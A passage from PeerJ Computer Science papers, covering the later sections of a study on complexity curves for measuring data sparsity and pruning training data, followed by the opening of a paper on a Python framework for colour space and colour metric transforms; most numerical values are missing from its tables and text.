structure. the zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table data complexity measures used in experiments. 
id description f maximum fisher’s discriminant ratio f v directional-vector maximum fisher’s discriminant ratio f overlap of the per-class bounding boxes f maximum individual feature efficiency f collective feature efficiency l minimized sum of the error distance of a linear classifier l training error of a linear classifier l nonlinearity of a linear classifier n fraction of points on the class boundary n ratio of average intra/inter class nearest neighbour distance n leave-one-out error rate of the one-nearest neighbour classifier n nonlinearity of the one-nearest neighbour classifier t fraction of maximum covering spheres t average number of points per dimension figure pearson’s correlations between complexity measures. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table pearson’s correlations coefficients between classifier auc roc performances and complexity measures. the largest absolute value in each row is printed in bold. aucc logt lda . . logistic regression − . . naive bayes − . . -nn − . . -nn − . . -nn − . . -nn − . . -nn − . . -nn − . . -nn − . . -nn − . . -nn − . . decision tree d = . − . decision tree d = − . . decision tree d = − . . decision tree d = − . . decision tree d = − . . decision tree d = − . . decision tree d = − . . decision tree d = − . . decision tree d = inf − . . difference is that t takes into account only the number of attributes while aucc considers also the shape of distributions of the individual attributes. correlations of aucc with other measures are much lower and it can be assumed that they capture different aspects of data complexity and may be potentially complementary. the next step was to show that information captured by aucc is useful for explaining classifier performance. in order to do so, we trained a number of different classifiers on the benchmark data sets and evaluated their performance using random train-test split with proportion . repeated times. the performance measure used was the area under the roc curve. we selected three linear classifiers—naïve bayes with gaussian kernel, linear discriminant analysis (lda) and logistic regression—and two families of non-linear classifiers of varying complexity: k-nearest neighbour classifier (k-nn) with different values of parameter k and decision tree (cart) with the limit on maximal tree depth. the intuition was as follows: the linear classifiers do not model attributes interdependencies, which is in line with complexity curve assumptions. selected non-linear classifiers on the other hand are—depending on the parametrisation—more prone to variance error, which should be captured by the complexity curve. correlations between aucc, logt , and classifier performance are presented in table . most of the correlations are weak and do not reach statistical significance; however, some general tendencies can be observed. as can be seen, auc roc scores of linear zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. classifiers have very little correlation with aucc and logt . this may be explained by the high-bias and low-variance nature of these classifiers: they are not strongly affected by data scarcity but their performance depends on other factors. this is especially true for the lda classifier, which has the weakest correlation among linear classifiers. 
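a minimal sketch of the correlation analysis described above is given below. it assumes that the aucc (or logt) values for each benchmark data set have already been computed; the classifier subset, the split proportion and the number of repetitions are placeholders, since the original experimental settings are not preserved here.

```python
import numpy as np
from scipy.stats import pearsonr
from sklearn.model_selection import train_test_split
from sklearn.metrics import roc_auc_score
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier

def mean_auc(clf, X, y, repeats=10, test_size=0.33, seed=0):
    """average test auc roc over repeated random stratified train-test splits."""
    scores = []
    for i in range(repeats):
        X_tr, X_te, y_tr, y_te = train_test_split(
            X, y, test_size=test_size, stratify=y, random_state=seed + i)
        p = clf.fit(X_tr, y_tr).predict_proba(X_te)[:, 1]
        scores.append(roc_auc_score(y_te, p))
    return np.mean(scores)

classifiers = {                         # illustrative subset of the classifier families above
    "lda": LinearDiscriminantAnalysis(),
    "5-nn": KNeighborsClassifier(n_neighbors=5),
    "tree d=3": DecisionTreeClassifier(max_depth=3, random_state=0),
}

def correlate_with_measure(datasets, measure_values):
    """datasets: list of (X, y) binary problems; measure_values: matching aucc (or logt) scores."""
    for name, clf in classifiers.items():
        aucs = [mean_auc(clf, X, y) for X, y in datasets]
        r, p = pearsonr(measure_values, aucs)
        print(f"{name}: r = {r:+.2f} (p = {p:.3f})")
```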
in k-nn, classifier complexity depends on k parameter: with low k values, it is more prone to variance error, with a larger k it is prone to bias if the sample size is not large enough (domingos, ). both aucc and logt seem to capture the effect of sample size in the case of large k values well (correlations − . and . for -nn). however, for k= the correlation with aucc is stronger (− . vs . ). depth parameter in decision tree also regulates complexity: the larger the depth the more classifier is prone to variance error and less to bias error. this suggests that aucc should be more strongly correlated with performance of deeper trees. on the other hand, complex decision trees explicitly model attribute interdependencies ignored by complexity curve, which may weaken the correlation. this is observed in the obtained results: for a decision stub (tree of depth ), which is low-variance high-bias classifier, correlation with aucc and logt is very weak. for d = and d = it becomes visibly stronger, and then for larger tree depth it again decreases. it should be noted that with large tree depth, as with small k values in k-nn, aucc has stronger correlation with the classifier performance than logt . a slightly more sophisticated way of applying data complexity measures is an attempt to explain classifier performance relative to some other classification method. in our experiments, lda is a good candidate for reference method since it is simple, has low variance and is not correlated with either aucc or logt . table presents correlations of both measures with classifier performance relative to lda. here we can see that correlations for aucc are generally higher than for logt and reach significance for the majority of classifiers. especially in the case of decision tree, aucc explains relative performance better than logt (correlation . vs − . for d = inf). results of the presented correlation analyses demonstrate the potential of the complexity curve to complement the existing complexity measures in explaining classifier performance. as expected from theoretical considerations, there is a relation between how well aucc correlates with classifier performance and the classifier’s position in the bias–variance spec- trum. it is worth noting that despite the attribute independence assumption the complexity curve method proved useful for explaining performance of complex non-linear classifiers. large p, small n problems there is a special category of machine learning problems in which the number of attributes p is large with respect to the number of samples n, perhaps even order of magnitudes larger. many important biological data sets, most notably data from microarray experiments, fall into this category (johnstone & titterington, ). to test how our complexity measure behaves in such situations, we calculated aucc scores for a few microarray data sets and compared them with auc roc scores of some simple classifiers. classifiers were evaluated as in the previous section. detailed information about the data sets is given in supplemental information as table s . zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table pearson’s correlations coefficients between classifier auc roc performances relative to lda performance and complexity measures. the largest absolute value in each row is printed in bold. aucc logt lda - logistic regression . − . lda - naive bayes . 
− . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - decision tree d = . . lda - decision tree d = . − . lda - decision tree d = . − . lda - decision tree d = . − . lda - decision tree d = . − . lda - decision tree d = . − . lda - decision tree d = . − . lda - decision tree d = . − . lda - decision tree d = inf . − . results of the experiment are presented in table . as expected, with the number of attributes much larger than the number of observations, data is considered by our metric as extremely scarce –values of aucc are in all cases above . . on the other hand, the auc roc classification performance is very varied between data sets with scores approaching or equal to . for leukemia and lymphoma data sets, and scores around . baseline for prostate. this is because, despite the large number of dimensions, the form of the optimal decision function can be very simple, utilising only a few of available dimensions. the complexity curve does not consider the shape of decision boundary at all, and thus does not reflect differences in classification performance. from this analysis we concluded that complexity curve is not a good predictor of classifier performance for data sets containing a large number of redundant attributes, as it does not differentiate between important and unimportant attributes. the logical way to proceed in such case would be to perform some form of feature selection or dimensionality reduction on the original data, and then calculate the complexity curve in the reduced dimensions. applications interpreting complexity curves in order to prove the practical applicability of the proposed methodology, and show how complexity curve plot can be interpreted, we performed experiments with six simple zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table areas under conditional complexity curve (aucc) for microarray data sets along auc roc values for different classifiers. dataset aucc -nn -nn dt d- dt d-inf lda nb lr adenocarcinoma . . . . . . . . breast . . . . . . . . breast . . . . . . . . colon . . . . . . . . leukemia . . . . . . . . lymphoma . . . . . . . . prostate . . . . . . . . notes. k-nn, k-nearest neighbour; dt, cart decision tree; lda, linear discriminant analysis; nb, naïve bayes; lr, logistic regression. data sets from uci machine learning repository (frank & asuncion, ). the sets were chosen only as illustrative examples. the basic properties of the data sets are given in supplemental information as table s . for each data set, we calculated conditional complexity curve. the curves are presented in fig. . learning curves of cart decision tree (dt) were included for comparison. on most of the benchmark data sets we can see that complexity curve upper bounds the dt learning curve. the bound is relatively tight in the case of glass and iris, and looser for breast-cancer-wisconsin and wine data set. a natural conclusion is that a lot of variability contained in this last data set and captured by the hellinger distance is irrelevant to the classification task. the most straightforward explanation would be the presence of unnecessary attributes not correlated with the class which can be ignored altogether. this is consistent with the results of various studies in feature selection. choubey et al. 
( ) identified that in glass data – attributes ( – %) are relevant, in iris data attributes ( %), and in breast-cancer-wisconsin – attributes ( – %). similar results were obtained for breast-cancer-wisconsin in other studies, which found that only of the original attributes ( %) contribute to the classification (ratanamahatana & gunopulos, ; liu, motoda & dash, ). dy & brodley ( ) obtained the best classification results for the wine data set with attributes ( %).

on monks- and car, the complexity curve is no longer a proper upper bound on the dt learning curve. this is an indication of models relying heavily on attribute interdependencies to determine the correct class. this is not surprising: both monks- and car are artificial data sets with discrete attributes devised for the evaluation of rule-based and tree-based classifiers (thrun et al., ; bohanec & rajkovič, ). classes are defined with logical formulas utilising relations of multiple attributes rather than single values—clearly the attributes are interdependent. in that context, the complexity curve can be treated as a baseline for the independent attribute situation and the generalisation curve as a diagnostic tool indicating the presence of interdependencies.

besides the slope of the complexity curve we can also analyse its variability. we can see that the shape of the wine complexity curve is very regular with small variance in each point, while the glass curve displays much higher variance. this means that the observations in the glass data set are more diverse and some observations (or their combinations) are more important for representing the data structure than others.

figure conditional complexity curves for six different data sets from the uci machine learning repository, with areas under the complexity curve (aucc) reported in the panels: (a) car, (b) monks- , (c) iris, (d) breast-cancer-wisconsin, (e) glass, (f) wine.

this short analysis demonstrates how to use complexity curves to compare properties of different data sets. here only the decision tree was used as a reference classifier. the method can be easily extended to include multiple classifiers and compare their performance. we present such an extended analysis in the supplemental information.

data pruning with complexity curves
the problem of data pruning in the context of machine learning is defined as reducing the size of the training sample in order to reduce classifier training time and still achieve satisfactory performance. it becomes extremely important as the data grows and (a) does not fit the memory of a single machine, (b) training times of more complex algorithms become very long. a classic method for performing data pruning is progressive sampling—training the classifier on data samples of increasing size as long as its performance increases. provost, jensen & oates ( ) analysed various schedules for progressive sampling and recommended geometric sampling, in which the sample size is multiplied by a specified constant in each iteration, as the reasonable strategy in most cases. geometric sampling uses samples of sizes $a^i n_0$, where $n_0$ is the initial sample size, $a$ the multiplier and $i$ the iteration number.
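a minimal sketch of the geometric progressive-sampling baseline just described is given below. it assumes numpy array inputs and a held-out validation split, and the stopping rule (no accuracy improvement beyond a small tolerance) is a simplification of proper convergence detection; the default sample size and multiplier are placeholders.

```python
import numpy as np
from sklearn.base import clone
from sklearn.metrics import accuracy_score

def geometric_progressive_sampling(clf, X_tr, y_tr, X_val, y_val,
                                   n0=100, a=2, tol=1e-3, seed=0):
    """train on random samples of size n0, a*n0, a**2*n0, ... and stop when the
    validation accuracy no longer improves (or the whole training set is used)."""
    order = np.random.default_rng(seed).permutation(len(X_tr))
    n, best_acc = n0, -np.inf
    while True:
        idx = order[:min(n, len(X_tr))]
        model = clone(clf).fit(X_tr[idx], y_tr[idx])
        acc = accuracy_score(y_val, model.predict(X_val))
        if acc <= best_acc + tol or len(idx) == len(X_tr):
            return model, len(idx)       # converged, or no data left to add
        best_acc, n = acc, n * a
```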
in our method, instead of training classifier on the drawn data sample, we are probing the complexity curve. we are not trying to detect the convergence of classifier accuracy, but just search for a point on the curve corresponding to some reasonably small hellinger distance value, e.g., . . this point designates the smallest data subset which still contains the required amount of information. in this setting, we were not interested in calculating the whole complexity curve but just in finding the minimal data subset, which still contains most of the original information. the search procedure should be as fast as possible, since the goal of the data pruning is to save time spent on training classifiers. to comply with these requirements, we constructed a criterion function of the form f (x)=h (gx,d)−t, where d denotes a probability distribution induced by the whole data set, gx a distribution induced by random subset of size x and t is the desired hellinger distance. we used classic brent method (brent, ) to find a root of the criterion function. in this way, data complexity was calculated only for the points visited by brent’s algorithm. to speed up the procedure even further, we used the standard complexity curve instead of the conditional one and settled for whitening transform as the only preprocessing technique. to verify if this idea is of practical use, we performed an experiment with three bigger data sets from uci repository. their basic properties are given in supplemental information as table s . for all data sets, we performed a stratified fold cross validation experiment. the training part of a split was pruned according to our criterion function with t = . (cc pruning) or using geometric progressive sampling with multiplier a= and initial sample size n = (ps pruning). achieving the same accuracy as with cc pruning was used as a stop criterion for progressive sampling. classifiers were trained on pruned and unpruned data and evaluated on the testing part of each cross validation split. standard error was calculated for the obtained values. we have used machine learning algorithms from the scikit-learn library (pedregosa et al., ) and the rest of the procedure was implemented in python with the help of numpy and scipy libraries. calculations were done on a workstation with core intel r© core tm i - . ghz cpu working under arch gnu/linux. table presents measured times and obtained accuracies. as can be seen, the difference in classification accuracies between pruned and unpruned training data is negligible. cc compression rate differs for the three data sets, which suggests that they are of different complexity: for led data only % is needed to perform successful classification, while zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table obtained accuracies and training times of different classification algorithms on unpruned and pruned data sets. score corresponds to classifier accuracy, time to classifier training time (including pruning procedure), rate to compression rate. cc corresponds to data pruning with complexity curves, ps to data pruning with progressive sampling. classifier score cc score time cc time ps time ps rate waveform mean cc compression rate: . ± . mean cc compression time: . ± . linear svc . ± . . ± . . ± . . ± . . ± . . ± . gaussian nb . ± . . ± . . ± . . ± . . ± . . ± . rf . ± . . ± . . ± . . ± . . ± . . ± . 
svc . ± . . ± . . ± . . ± . . ± . . ± . tree . ± . . ± . . ± . . ± . . ± . . ± . logit . ± . . ± . . ± . . ± . . ± . . ± . gbc . ± . . ± . . ± . . ± . . ± . . ± . led mean cc compression rate: . ± . mean cc compression time: . ± . linear svc . ± . . ± . . ± . . ± . . ± . . ± . gaussian nb . ± . . ± . . ± . . ± . . ± . . ± . rf . ± . . ± . . ± . . ± . . ± . . ± . svc . ± . . ± . . ± . . ± . . ± . . ± . tree . ± . . ± . . ± . . ± . . ± . . ± . logit . ± . . ± . . ± . . ± . . ± . . ± . gbc . ± . . ± . . ± . . ± . . ± . . ± . adult mean cc compression rate: . ± . mean cc compression time: . ± . linear svc . ± . . ± . . ± . . ± . . ± . . ± . gaussian nb . ± . . ± . . ± . . ± . . ± . . ± . rf . ± . . ± . . ± . . ± . . ± . . ± . svc . ± . . ± . . ± . . ± . . ± . . ± . tree . ± . . ± . . ± . . ± . . ± . . ± . logit . ± . . ± . . ± . . ± . . ± . . ± . gbc . ± . . ± . . ± . . ± . . ± . . ± . notes. linear svc, linear support vector machine; gaussian nb, naïve bayes with gaussian kernel; rf, random forest cart trees; svc, support vector machine with radial ba- sis function kernel; tree, cart decision tree; logit, logistic regression; gbc, gradient boosting classifier with cart trees. adult data is pruned at %. cc compression rate is rather stable with only small standard deviation, but ps compression rate is characterised with huge variance. in this regard, complexity curve pruning is preferable as a more stable pruning criterion. in all cases when training a classifier on the unpruned data took more than s, we observed huge speed-ups. with the exception of svc on led data set, complexity curve pruning performed better than progressive sampling in such cases. unsurprisingly, real speed-ups were visible only for computationally intensive methods such as support vector machines, random forest and gradient boosted decision trees. for simple methods such as naïve bayes, decision tree or logistic regression, fitting the model on the unpruned data is often faster than applying the pruning strategy. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. these results present complexity curve pruning as a reasonable model-free alternative to progressive sampling. it is more stable and often less demanding computationally. it does not require additional convergence detection strategy, which is always an important consideration when applying progressive sampling in practice. what is more, complexity curve pruning can also be easily applied in the context of online learning, when the data is being collected on the fly. after appending a batch of new examples to the data set, hellinger distance between the old data set and the extended one can be calculated. if the distance is smaller than the chosen threshold, the process of data collection can be stopped. conclusions in this article, we introduced a measure of data complexity targeted specifically at data sparsity. this distinguish it from other measures focusing mostly on the shape of optimal decision boundary in classification problems. the introduced measure has a form of graphical plot—complexity curve. we showed that it exhibits desirable properties through a series of experiments on both artificially constructed and real-world data sets. we proved that complexity curve capture non-trivial characteristics of the data sets and is useful for explaining the performance of high-variance classifiers. 
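to illustrate the pruning criterion described above, the sketch below searches for the smallest subset size whose distribution stays within a hellinger distance t of the full data set, probing the curve with scipy's brent root finder. the histogram-based hellinger estimate (attributes treated as independent) is only a stand-in for the paper's estimator, and the search assumes the criterion changes sign on the interval; threshold and bin count are placeholders.

```python
import numpy as np
from scipy.optimize import brentq

def hellinger(X_sub, X_full, bins=20):
    """rough hellinger distance between per-attribute histogram estimates of the
    subset and full-data distributions (attributes treated as independent)."""
    h2 = 0.0
    for j in range(X_full.shape[1]):
        rng_j = (X_full[:, j].min(), X_full[:, j].max())
        p, _ = np.histogram(X_full[:, j], bins=bins, range=rng_j)
        q, _ = np.histogram(X_sub[:, j], bins=bins, range=rng_j)
        p, q = p / p.sum(), q / q.sum()
        h2 += 0.5 * np.sum((np.sqrt(p) - np.sqrt(q)) ** 2)
    return np.sqrt(h2 / X_full.shape[1])

def pruned_size(X, t=0.1, seed=0):
    """smallest subset size whose distribution stays within hellinger distance t
    of the full data set; brent's method probes the curve at only a few points."""
    rng = np.random.default_rng(seed)

    def criterion(x):                    # f(x) = h(g_x, d) - t
        n = max(2, int(x))
        idx = rng.choice(len(X), size=n, replace=False)
        return hellinger(X[idx], X) - t

    return int(brentq(criterion, 2, len(X), xtol=max(1.0, 1e-3 * len(X))))
```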
with the conditional complexity curve it was possible to perform a meaningful analysis even with heavily imbalanced data sets. we then demonstrated how the complexity curve can be used in practice for data pruning (reducing the size of the training set) and that it is a feasible alternative to the progressive sampling technique. this result is immediately applicable to all situations in which data overabundance starts to pose a problem. for instance, it is possible to perform a quick exploration study on a pruned data set before fitting computationally expensive models on the whole set. pruning results may also provide a suggestion for choosing a proper train-test split ratio or the number of folds of cross-validation in the evaluation procedure.

we argue that new measures of data characteristics, such as complexity curves, are needed to move away from a relatively static view of the classification task to a more dynamic one. it is worth investigating how various algorithms are affected by certain data manipulations; for example, when new data become available or the underlying distribution shifts. this would facilitate the development of more adaptive and universal algorithms capable of working in a dynamically changing environment.

experiments showed that in the presence of a large number of redundant attributes not contributing to the classification task, the complexity curve does not correlate well with classifier performance. it correctly identifies dimensional sparseness of the data, but that is misleading since the actual decision boundary may still be very simple. because of this, as the next step in our research we plan to apply a similar probabilistic approach to measure the information content of different attributes in a data set and use that knowledge for performing feature selection. graphs analogous to complexity curves and generalisation curves would be valuable tools for understanding characteristics of data sets and classification algorithms related to attribute structure.

another limitation of our method is the assumption of a lack of attribute interdependencies. while the presence of small dependencies does not disrupt the analysis, when strong high-dimensional dependencies are present, the complexity curve does not correlate with classifier performance well. this means that it is infeasible to use for some domains; for example, highly epistatic problems in bioinformatics.

our long-term goal is to gain a better understanding of the impact of data set structure, both in terms of contained examples and attributes, and to use that knowledge to build heterogeneous classification ensembles. we hope that better control over the data sets used in experiments will allow us to perform a more systematic study of classifier diversity and consensus methods.

additional information and declarations

funding
the study is co-funded by the european union from resources of the european social fund, project po kl "information technologies: research and their interdisciplinary applications," agreement uda-pokl. . . - - / - ; the polish national science centre (grant numbers: / /t/st / to jz, / /b/st / and / /b/nz / to jz and dp); and eu cost bm and bm actions. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors:
european union: uda-pokl. . . - - / - .
polish national science centre: / /t/st / , / /b/st / , / /b/nz / . eu cost: bm , bm . competing interests the authors declare there are no competing interests. author contributions • julian zubek conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • dariusz m. plewczynski conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: associated code is available to download at: https://github.com/zubekj/complexity_curve. (open source python implementation). zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/zubekj/complexity_curve http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references alcalá j, fernández a, luengo j, derrac j, garcía s, sánchez l, herrera f. . keel data-mining software tool: data set repository, integration of algorithms and exper- imental analysis framework. journal of multiple-valued logic and soft computing ( – ): – . bohanec m, rajkovic̆ v. . knowledge acquisition and explanation for multi- attribute decision. in: making, th international workshop expert systems and their applications. brent rp. . algorithms for minimization without derivatives. mineola: dover publications. choubey sk, deogun js, raghavan vv, sever h. . a comparison of feature selection algorithms in the context of rough classifiers. in: proceedings of the fifth ieee international conference on fuzzy systems, vol. . piscataway: ieee, – . chvátal v. . the tail of the hypergeometric distribution. discrete mathematics ( ): – doi . / - x( ) - . cieslak da, hoens tr, chawla nv, kegelmeyer wp. . hellinger distance decision trees are robust and skew-insensitive. data mining and knowledge discovery ( ): – doi . /s - - - . díez-pastor jf, rodríguez jj, garcía-osorio ci, kuncheva li. . diversity techniques improve the performance of the best imbalance learning ensembles. information sciences : – doi . /j.ins. . . . domingos p. . a unified bias-variance decomposition for zero-one and squared loss. in: aaai/iaai. palo alto: aaai press, – . dy jg, brodley ce. . feature selection for unsupervised learning. the journal of machine learning research : – doi . /j.patrec. . . . frank a, asuncion a. . uci machine learning repository. irvine: university of california, irvine, school of information and computer sciences. ho tk. . data complexity analysis: linkage between context and solution in classification. in: lobo ndv, kasparis t, roli f, kwok jt, georgiopoulos m, anagnostopoulos gc, loog m, eds. structural, syntactic, and statistical pattern recognition. lecture notes in computer science, vol. . berlin heidelberg: springer, . ho tk, basu m. . complexity measures of supervised classification problems. ieee transactions on pattern analysis and machine intelligence ( ): – doi . / . . ho tk, basu m, law mhc. . measures of geometrical complexity in classification problems. in: data complexity in pattern recognition. berlin heidelberg: springer, – . zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. 
#supplemental-information http://dx.doi.org/ . / - x( ) - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. hyvärinen a, oja e. . independent component analysis: algorithms and applica- tions. neural networks ( – ): – doi . /s - ( ) - . johnstone im, titterington dm. . statistical challenges of high-dimensional data. philosophical transactions of the royal society of london a: mathematical, physical and engineering sciences ( ): – doi . /rsta. . . li l, abu-mostafa ys. . data complexity in machine learning. technical report. california institute of technology, pasadena. liu h, motoda h, dash m. . a monotonic measure for optimal feature selection. in: machine learning: ecml- . berlin heidelberg: springer, – . luengo j, herrera f. . an automatic extraction method of the domains of com- petence for learning classifiers using data complexity measures. knowledge and information systems ( ): – doi . /s - - - . màcia n, bernadó-mansilla e, orriols-puig a, kam ho t. . learner excellence biased by data set selection: a case for data characterisation and artificial data sets. pattern recognition ( ): – doi . /j.patcog. . . . mantovani rg, rossi ald, vanschoren j, bischl b, carvalho acplf. . to tune or not to tune: recommending when to adjust svm hyper-parameters via meta- learning. in: international joint conference on neural networks (ijcnn), – . orriols-puig a, macià n, ho tk. . documentation for the data complexity library in c++. technical report. la salle—universitat ramon llull, barcelona. available at http://dcol.sourceforge.net/ . pedregosa f, varoquaux g, gramfort a, michel v, thirion b, grisel o, blondel m, prettenhofer p, weiss r, dubourg v, vanderplas j, passos a, cournapeau d, brucher m, perrot m, duchesnay e. . scikit-learn: machine learning in python. journal of machine learning research : – . provost f, jensen d, oates t. . efficient progressive sampling. in: proceedings of the fifth acm sigkdd international conference on knowledge discovery and data mining, kdd’ . new york: acm, – . ratanamahatana ca, gunopulos d. . feature selection for the naive bayesian classifier using decision trees. applied artificial intelligence ( – ): – doi . / . scott d. . multivariate density estimation: theory, practice, and visualization. hobo- ken: wiley. skala m. . hypergeometric tail inequalities: ending the insanity. arxiv preprint. arxiv: . . smith mr, martinez t, giraud-carrier c. . an instance level analysis of data complexity. machine learning ( ): – doi . /s - - -z. smith-miles k, baatar d, wreford b, lewis r. . towards objective measures of algorithm performance across instance space. computers & operations research : – doi . /j.cor. . . . smith-miles k, lopes l. . measuring instance difficulty for combinatorial optimization problems. computers & operations research ( ): – doi . /j.cor. . . . zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /rsta. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.patcog. . . http://dcol.sourceforge.net/ http://dx.doi.org/ . / http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /peerj-cs. 
thrun sb, bala jw, bloedorn e, bratko i, cestnik b, cheng j, jong kad, dzeroski s, fisher dh, fahlman se, hamann r, kaufman ka, keller s, kononenko i, kreuziger js, michalski rs, mitchell ta, pachowicz pw, vafaie h, welde wvd, wenzel w, wnek j, zhang j. . the monk’s problems: a performance comparison of different learning algorithms. technical report cmu.-cs- - . carnegie mellon university. yin l, ge y, xiao k, wang x, quan x. . feature selection for high-dimensional imbalanced data. neurocomputing : – doi . /j.neucom. . . . zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /peerj-cs. submitted august accepted february published march corresponding author ivar farup, ivar.farup@ntnu.no academic editor klara kedem additional information and declarations can be found on page doi . /peerj-cs. copyright farup distributed under creative commons cc-by . open access a computational framework for colour metrics and colour space transforms ivar farup faculty of computer science and media technology, gjøvik university college, norway abstract an object-oriented computational framework for the transformation of colour data and colour metric tensors is presented. the main idea of the design is to represent the transforms between spaces as compositions of objects from a class hierarchy providing the methods for both the transforms themselves and the corresponding jacobian matrices. in this way, new colour spaces can be implemented on the fly by transforming from any existing colour space, and colour data in various formats as well as colour metric tensors and colour difference data can easily be transformed between the colour spaces. this reduces what normally requires several days of coding to a few lines of code without introducing a significant computational overhead. the framework is implemented in the python programming language. subjects computer vision, graphics, optimization theory and computation, scientific computing and simulation, software engineering keywords colour metrics, colour space, transform, object-oriented, python introduction colour data such as measured colours, specified colours or pixels of colour images are most commonly described as sets of points in a three-dimensional space—a so-called colour space. many different colour spaces are currently in use in various settings. for many applications, selecting the best colour space for processing the data can be crucial (plataniotis & venetsanopoulos, ). converting between all the different colour spaces can be challenging. different conventions for scaling and normalisation is used, and many of the colour spaces commonly in use are inaccurately defined. the complexity of conversion is particularly present for computations involving colour metric data, which, by nature, is tensorial (deza & deza, ), giving rise to the need for not only the direct transformations, but also the corresponding jacobian matrices—a tedious and error-prone process (pant & farup, ). so far, no common framework for such transformations of colour data and metrics including the automated computation of jacobian matrices has been constructed. from other fields of computational science, it is well established that object-oriented frameworks can be useful for simplifying such matters (beall & shephard, ). 
with the advent of modern high-level interpreted languages, the computational overhead is not nearly as high as before, and the ease of use has increased significantly (cai, langtangen & moe, ). thus, in order to simplify matters for colour science and engineering, an object-oriented framework for colour space construction and for the conversion of colour data and colour metric tensor data is designed. the framework is currently limited to three-dimensional colour spaces. following the background material on the principles of transforming colour data and related tensorial data in the next section, the principles and ideas underlying the framework are presented. to demonstrate to which degree the framework simplifies the implementation of colour data and metric transformations, an implementation of the framework using the high-level programming language python (van rossum & drake, ) is applied to some standard example problems.

background

transformation of colour data
transformations between different colour spaces can in general take the shape of a function, $\bar{\mathbf{x}} = \bar{\mathbf{x}}(\mathbf{x})$, where $\mathbf{x} = (x_1, x_2, x_3)^{\mathsf T}$ represents a colour, i.e., a point in a colour space. fortunately, most common colour space conversions are made up of a small set of relatively simple mathematical operations. the linear transformation is a very common ingredient in the transforms. some colour spaces, such as, e.g., the ciecat colour adaptation space (moroney et al., ), are even defined simply by a linear transformation from some other colour space:
$$\bar{\mathbf{x}} = A\mathbf{x},$$
where $A$ is a $3\times 3$ constant matrix. combined with the so-called gamma correction, which is applied channel-wise, most rgb-type colour spaces, and also, e.g., the ipt (ebner & fairchild, ) colour space can be constructed:
$$\bar{x}_i = \operatorname{sgn}(x_i)\,|x_i|^{\gamma},$$
where $\gamma > 0$ is the constant exponent. for many perceptual colour spaces such as cielab, both cartesian and cylindrical coordinates are commonly used for describing the chromatic plane. the transformation from cartesian to polar is
$$\bar{x}_1 = x_1, \qquad \bar{x}_2 = \sqrt{x_2^2 + x_3^2}, \qquad \bar{x}_3 = \operatorname{atan2}(x_3, x_2),$$
with the corresponding inverse transform
$$\bar{x}_1 = x_1, \qquad \bar{x}_2 = x_2\cos(x_3), \qquad \bar{x}_3 = x_2\sin(x_3).$$
chromaticities and luminances are often represented in projective spaces such as xyy,
$$\bar{x}_1 = \frac{x_1}{x_1 + x_2 + x_3}, \qquad \bar{x}_2 = \frac{x_2}{x_1 + x_2 + x_3}, \qquad \bar{x}_3 = x_2.$$
colour spaces used for colour metrics such as ee (oleari, melgosa & huertas, ) and the various din metrics (cui et al., ) often include a logarithmic compression of some or all of the channels such as lightness and chroma (radius in polar coordinates):
$$\bar{x}_i = a_i \ln(1 + b_i x_i),$$
where $a_i$ and $b_i$ are the parameters of the transform. recently, the poincaré disk representation of the hyperbolic plane has been used for representing the chromatic plane (lenz, carmona & meer, ; farup, ). the chroma-preserving mapping to the poincaré disk can be written as a mapping of the radius in polar coordinates as
$$\bar{x}_2 = \tanh\!\left(\frac{x_2}{2R}\right),$$
where $R > 0$ is the radius of curvature.
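the generic building blocks above translate directly into vectorised numpy functions. the sketch below is illustrative and is not the package's actual code; in particular, the $2R$ scaling of the poincaré mapping argument is an assumption about the formula above.

```python
import numpy as np

def gamma(x, g):
    """channel-wise, sign-preserving gamma correction."""
    return np.sign(x) * np.abs(x) ** g

def to_polar(x):
    """(x1, x2, x3) -> (x1, chroma, hue angle) for an n x 3 array."""
    out = np.empty_like(x)
    out[:, 0] = x[:, 0]
    out[:, 1] = np.hypot(x[:, 1], x[:, 2])
    out[:, 2] = np.arctan2(x[:, 2], x[:, 1])
    return out

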